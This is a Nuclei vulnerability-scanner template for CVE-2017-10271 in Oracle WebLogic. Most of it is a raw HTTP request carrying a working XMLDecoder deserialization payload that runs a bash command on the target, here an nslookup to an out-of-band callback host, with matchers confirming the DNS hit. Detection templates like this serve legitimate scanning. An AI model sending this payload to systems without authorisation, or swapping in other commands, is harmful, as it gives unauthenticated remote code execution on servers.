nuclei-templates/cves/2017/CVE-2017-10271.yaml

66 lines
2.6 KiB
YAML

id: CVE-2017-10271
info:
name: Oracle WebLogic Server Component Remote Command Execution
author: dr_set
severity: high
description: The Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent - WLS Security) is susceptible to component deserialization remote command execution. Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0 and 12.2.1.2.0. Unauthenticated attackers with network access via T3 can leverage this vulnerability to compromise Oracle WebLogic Server.
reference:
- https://github.com/vulhub/vulhub/tree/fda47b97c7d2809660a4471539cd0e6dbf8fac8c/weblogic/CVE-2017-10271
- https://github.com/SuperHacker-liuan/cve-2017-10271-poc
- https://www.oracle.com/security-alerts/cpuoct2017.html
- https://nvd.nist.gov/vuln/detail/CVE-2017-10271
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
cvss-score: 7.50
cve-id: CVE-2017-10271
tags: cve,cve2017,rce,oracle,weblogic,oast
requests:
- raw:
- |
POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: {{Hostname}}
Accept: */*
Accept-Language: en
Content-Type: text/xml
<?xml version="1.0" encoding="utf-8"?>
<soapenv:Envelope
xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
<work:WorkContext
xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.4.0" class="java.beans.XMLDecoder">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>/bin/bash</string>
</void>
<void index="1">
<string>-c</string>
</void>
<void index="2">
<string>nslookup {{interactsh-url}}</string>
</void>
</array>
<void method="start"/></void>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol # Confirms the DNS interaction
words:
- "dns"
- type: status
status:
- 500
# Enhanced by mp on 2022/04/05